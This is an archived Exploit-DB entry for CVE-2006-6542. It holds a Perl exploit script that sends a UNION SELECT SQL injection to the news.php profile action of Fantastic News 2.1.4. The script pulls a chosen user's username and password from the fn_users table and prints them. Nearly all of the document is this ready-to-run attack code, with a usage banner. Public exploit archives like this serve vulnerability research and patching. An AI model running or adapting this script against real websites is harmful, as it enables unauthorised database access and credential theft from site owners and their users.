Fantastic News 2.1.4 news.php Remote SQL Injection Exploit

2006-12-09T00:00:00
ID EDB-ID:2906
Type exploitdb
Reporter Bl0od3r
Modified 2006-12-09T00:00:00

Description

Fantastic News 2.1.4 (news.php) Remote SQL Injection Exploit. CVE-2006-6542. Webapps exploit for php platform

                                        
                                            #!perl
#Download:http://fscripts.com/download.php?file=1
use IO::Socket;
#dc3.dl.am
if (@ARGV<3) {
&header;
} else {
&get();
}
sub get() {
$host=$ARGV[0];
$path=$ARGV[1];
  $id=$ARGV[2];
$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80)
or die ("[-]Error\n");
print "[~]Connecting!\n";
print "[~]Getting Data!\n";
print $socket "GET
".$path."/news.php?action=profile&id=-1%20UNION%20SELECT%201,2,3,4,5,password,1,2,3,4,5,6,7,8,9%20FROM%20fn_users%20WHERE%20user_id=".$id."/*
HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

while ($ans=<$socket>) {
$ans=~ m/<td>(.*?)<\/td>/ && print
"--------------------------------------------\n[+]UserName:
$1\n[+]PassWord:";
if ($1) {
$success=1; } else { $success=0;};
}
if ($success=="1") {
print "\n[+]Successed!";
 } else {
print "[-]Error";
   }
 }
sub header() {
print "\n";
print "#######################################\n";
print "#                                     #\n";
print "#            #  #####   #####         #\n";
print "#            #  #           #         #\n";
print "#         ####  #         ###         #\n";
print "#         #  #  #           #         #\n";
print "#         ####  #####   #####         #\n";
print "#                                     #\n";
print "#      fscripts.pl host /path/ 1      #\n";
print "#                                     #\n";
print "#######################################\n";
print "\n";
exit;
}
#dc3.dl.am
#---------------------
#bY dCÂł - Crew ...

# milw0rm.com [2006-12-09]